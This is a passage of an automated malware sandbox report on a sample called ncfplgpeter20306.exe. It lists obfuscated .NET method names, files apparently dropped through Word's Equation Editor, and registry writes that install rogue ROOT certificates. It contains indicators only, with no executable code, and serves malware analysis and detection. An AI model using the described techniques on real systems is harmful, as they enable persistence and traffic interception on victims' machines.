                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, fSdvMKZMagrtwMm7Ri.csHigh entropy of concatenated method names: 'lq2yprocYj', 'nEuyDyGS7y', 'IYryswC2ld', 'nvAy3Hoa8O', 'hRjyJPOISS', 'jDsyeSX940', 'o7iyCsHSMo', 'DnVyR9lYX6', 'DTQyx7NjxD', 'mKPy5h79Hy'
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, O9PymkJ3NMlC2399qj.csHigh entropy of concatenated method names: 'JKQhsEQCnj', 'o1Ah3VGbtY', 'GAThHYAQtH', 'Enah09bSsm', 'XX6hbdHFie', 'lgehgYG4SG', 'TZAhf0svRZ', 'TJEhckoEtg', 'RcthTZ3osW', 'FO5hjXiRBb'
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, pBjySHqM5QnwRNWaSBd.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Q9V5qOaeUr', 'h9u5XNVCx7', 'ufn5G8oA96', 'hl95AuUrbM', 'hsu5SjNYox', 'xFD5N7vpyl', 'Skh5Ydgfbf'
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, xGB0Wf6bc0bOdc8jTI.csHigh entropy of concatenated method names: 'kTtEwQ9SoG', 'kClEM2Olvv', 'OTJynuxQtD', 'jUNybontt7', 'lvTyg7lONl', 'Up9yi4TYcW', 'myLyfre4Cc', 'fSgycK60ak', 'kBRyWA5x19', 'hseyTKO9Er'
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, KdpVO0auC752URy1LH.csHigh entropy of concatenated method names: 'ToString', 'Po7ejc2CtV', 'Li3e0yrEQ1', 'gqcenHUq3F', 'cTYebFVO9p', 'n2CegR7eyF', 'kTfeiJlr7P', 'jBIefowaER', 'jS7ecR3arw', 'iuMeWWiTPi'
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, AnptoFjC7pNu1LqbY6.csHigh entropy of concatenated method names: 'CxkCFyqNu8', 'tj9CULHR6k', 'ToString', 'jC5CL1HVrm', 'MYdC69JfMJ', 'f0gCy1rBOY', 'pTuCEljQqC', 'NKNCOjgG2b', 'YOeC1GsAfv', 'GMgCKDLHCP'
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, qyT5B9fG4eENyHVdsw.csHigh entropy of concatenated method names: 'GDqlxlYY4', 'hF5peEa0M', 'o9TDoN5Sa', 'wU4MruruE', 'K6k3fAj0h', 'DvImOJLqB', 'zPRJ50FG9eMejJkPmf', 'xSdN05GCNU8MZjBOu4', 'LtVR8YQni', 'nNH5UoFYi'
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, ojeKecA3ycAgUvCgAn.csHigh entropy of concatenated method names: 'BIix9SCJrv', 'PtdxQIBCLk', 'IYPxdRPe6o', 'J5cxL9cHMs', 'CZAx6rxAZF', 'DFAxEvYZXS', 'VmAxOPV1Wm', 'AjdRYjjrNi', 'K6VRuXW5nW', 'EtMRayGmQ3'
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, kIOpWCowqWShKUKAee.csHigh entropy of concatenated method names: 'fE5OI5NlLu', 'JfaO6bhCVu', 'PbdOEEUXYB', 'HStO1rReIi', 'FpJOKcMl0A', 'Ae8ESKhqgT', 'xT8ENk6Jhd', 'ISGEY5g6xW', 'Gq6EuAu9tU', 'O17EaNTZyA'
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, KSQ07YHqchvMXla9N1.csHigh entropy of concatenated method names: 'KKiRLLy6UN', 'HyrR6tuCpv', 'I8FRyKkQtY', 'FLLREStOBv', 'y0gROgqMIT', 'fE7R1G5hdk', 'gYnRKgLSgW', 'eixR7pHk04', 'g1yRFMTaBb', 'qkbRU4rFDr'
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, Uel8r1lQF2PkteGZrv.csHigh entropy of concatenated method names: 'ltB6qcLvY0', 'brs6XHEJGa', 'WxM6GUBM0C', 'vP96AccmpA', 'YcG6SWCc1l', 'ePZ6NA8XmP', 'GaS6YUKp4S', 'ygy6uRCKrX', 'miQ6aI944q', 's4k6o6UxDd'
                Source: 5.2.ncfplgpeter20306.exe.216ee4c.5.raw.unpack, JK.csHigh entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
                Source: 5.2.ncfplgpeter20306.exe.220000.0.raw.unpack, JK.csHigh entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
                Source: 5.2.ncfplgpeter20306.exe.21b6cb8.4.raw.unpack, JK.csHigh entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
                Source: 5.2.ncfplgpeter20306.exe.2165834.2.raw.unpack, JK.csHigh entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, Rsjwms4Wh8At7jltVf.csHigh entropy of concatenated method names: 'saV14aRn5H', 'moE1P52r93', 'TKw1lioyLO', 'Tgp1pca6Bh', 'Cmy1we7IUo', 'Wgq1DupFs5', 'CaI1Mi57nK', 'Lbw1sLeqBx', 'idZ13c8NAv', 'O0T1mxeA09'
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, hnb1mywmKd17dlbrAS.csHigh entropy of concatenated method names: 'Dispose', 'mR89ae4IBQ', 'SJdk0qMKGV', 'puBVVvKaKN', 'tps9oyNhKU', 'PRD9z8IgcF', 'ProcessDialogKey', 'E2dk8n82kY', 't9gk9jtrH3', 'mBmkkAPsqe'
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, LVNaJWsMIVA7LTLASE.csHigh entropy of concatenated method names: 'zu7RHG1UCo', 'vEbR0GP5w9', 'Eo1RnLElCC', 'zSyRb4C8gr', 'L0DRqt1jRb', 'TXZRg6Ppie', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, D33N8oUtGVx7cDxPuT.csHigh entropy of concatenated method names: 'Lp7JThJpMH', 'q8ZJr8Jvgu', 'xaoJqZNHsW', 'CwFJX9qL4U', 'BgjJ0sJB97', 'HlbJnZxrmw', 'UUJJbpHxl3', 'TmgJgfpCvS', 'OX8Jiv5yws', 'f4pJfSeAAh'
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, zQyvpDqyxKTxd6tm0NN.csHigh entropy of concatenated method names: 'GR7x4eMqyc', 'Kq8xPbdu6R', 'J7BxlIIphe', 'GQ7xpT3Nxd', 'LmaxwG8D2Y', 'R9hxDqi7L0', 'Ax6xMaB0Zt', 'NxYxs9KyRH', 'MlHx3p2K2W', 'VG5xmLUKfn'
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, ksWtZCxKsl0TxRCTo8.csHigh entropy of concatenated method names: 'GMr1LFkylo', 'hBS1ywuum5', 'ro41O5nLLW', 'VWvOoTrbwJ', 'x5aOzGVTLw', 'IAf18nrD6A', 'n5n19G5FS1', 'fBl1kLDsu7', 'j8A1QDxhFt', 'QhN1d7YRXe'
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, pLwTg0qqY9GrvEoZXIs.csHigh entropy of concatenated method names: 'ToString', 'a145Q4j8pu', 'KEt5dvERQh', 'DdN5I8eM0e', 'f0E5LRPIbe', 'wT056EPSsu', 'gSU5yxunrt', 'Gsw5EYZYIa', 'f7knYFscmhRWVWPDeQu', 'mTw6y3s22lokcZlLY0g'
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, E0RYX9X2eibsstJT2l.csHigh entropy of concatenated method names: 'MToQIXKWBI', 'I3SQLs48n8', 'uf5Q6q4VEy', 'KWqQy0BBF1', 'UBEQEkuB7E', 'mIqQOFIKAA', 'wXWQ1wxG4a', 'sO5QKUDr8X', 'UTHQ7jmngF', 'T7eQFOJ0LT'
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, lDlgAUP9SyyXYURNLR.csHigh entropy of concatenated method names: 'EJi4pnojSnyAHRWqhYg', 'ErevP5orqMYelnaL321', 'kFEORtVAdX', 'Ku5Ox8stk6', 'OVRO5Ji6lb', 'CxNx8bo8umiUIrPhE6k', 'lIrvcSoddavqGvXHa7M'
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, sC7nprRRvT8OJFZjOZ.csHigh entropy of concatenated method names: 'rIk91RDsii', 'EuM9KyEpgg', 'KVG9F5wdH3', 'bJN9UWuJYc', 'ATy9J00PbH', 'l2k9e5iRIA', 'vgjpq3mDGeNj5ln0ix', 'wBXtHAIWQFkdYio0Cv', 'BC899EETi8', 'CUS9QYaSid'
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, fSdvMKZMagrtwMm7Ri.csHigh entropy of concatenated method names: 'lq2yprocYj', 'nEuyDyGS7y', 'IYryswC2ld', 'nvAy3Hoa8O', 'hRjyJPOISS', 'jDsyeSX940', 'o7iyCsHSMo', 'DnVyR9lYX6', 'DTQyx7NjxD', 'mKPy5h79Hy'
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, O9PymkJ3NMlC2399qj.csHigh entropy of concatenated method names: 'JKQhsEQCnj', 'o1Ah3VGbtY', 'GAThHYAQtH', 'Enah09bSsm', 'XX6hbdHFie', 'lgehgYG4SG', 'TZAhf0svRZ', 'TJEhckoEtg', 'RcthTZ3osW', 'FO5hjXiRBb'
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, pBjySHqM5QnwRNWaSBd.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Q9V5qOaeUr', 'h9u5XNVCx7', 'ufn5G8oA96', 'hl95AuUrbM', 'hsu5SjNYox', 'xFD5N7vpyl', 'Skh5Ydgfbf'
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, xGB0Wf6bc0bOdc8jTI.csHigh entropy of concatenated method names: 'kTtEwQ9SoG', 'kClEM2Olvv', 'OTJynuxQtD', 'jUNybontt7', 'lvTyg7lONl', 'Up9yi4TYcW', 'myLyfre4Cc', 'fSgycK60ak', 'kBRyWA5x19', 'hseyTKO9Er'
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, KdpVO0auC752URy1LH.csHigh entropy of concatenated method names: 'ToString', 'Po7ejc2CtV', 'Li3e0yrEQ1', 'gqcenHUq3F', 'cTYebFVO9p', 'n2CegR7eyF', 'kTfeiJlr7P', 'jBIefowaER', 'jS7ecR3arw', 'iuMeWWiTPi'
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, AnptoFjC7pNu1LqbY6.csHigh entropy of concatenated method names: 'CxkCFyqNu8', 'tj9CULHR6k', 'ToString', 'jC5CL1HVrm', 'MYdC69JfMJ', 'f0gCy1rBOY', 'pTuCEljQqC', 'NKNCOjgG2b', 'YOeC1GsAfv', 'GMgCKDLHCP'
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, qyT5B9fG4eENyHVdsw.csHigh entropy of concatenated method names: 'GDqlxlYY4', 'hF5peEa0M', 'o9TDoN5Sa', 'wU4MruruE', 'K6k3fAj0h', 'DvImOJLqB', 'zPRJ50FG9eMejJkPmf', 'xSdN05GCNU8MZjBOu4', 'LtVR8YQni', 'nNH5UoFYi'
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, ojeKecA3ycAgUvCgAn.csHigh entropy of concatenated method names: 'BIix9SCJrv', 'PtdxQIBCLk', 'IYPxdRPe6o', 'J5cxL9cHMs', 'CZAx6rxAZF', 'DFAxEvYZXS', 'VmAxOPV1Wm', 'AjdRYjjrNi', 'K6VRuXW5nW', 'EtMRayGmQ3'
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, kIOpWCowqWShKUKAee.csHigh entropy of concatenated method names: 'fE5OI5NlLu', 'JfaO6bhCVu', 'PbdOEEUXYB', 'HStO1rReIi', 'FpJOKcMl0A', 'Ae8ESKhqgT', 'xT8ENk6Jhd', 'ISGEY5g6xW', 'Gq6EuAu9tU', 'O17EaNTZyA'
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, KSQ07YHqchvMXla9N1.csHigh entropy of concatenated method names: 'KKiRLLy6UN', 'HyrR6tuCpv', 'I8FRyKkQtY', 'FLLREStOBv', 'y0gROgqMIT', 'fE7R1G5hdk', 'gYnRKgLSgW', 'eixR7pHk04', 'g1yRFMTaBb', 'qkbRU4rFDr'
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, Uel8r1lQF2PkteGZrv.csHigh entropy of concatenated method names: 'ltB6qcLvY0', 'brs6XHEJGa', 'WxM6GUBM0C', 'vP96AccmpA', 'YcG6SWCc1l', 'ePZ6NA8XmP', 'GaS6YUKp4S', 'ygy6uRCKrX', 'miQ6aI944q', 's4k6o6UxDd'

                Persistence and Installation Behavior

                barindex
                Installs new ROOT certificates
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HgCppsoKmxQq[1].exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeJump to dropped file
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
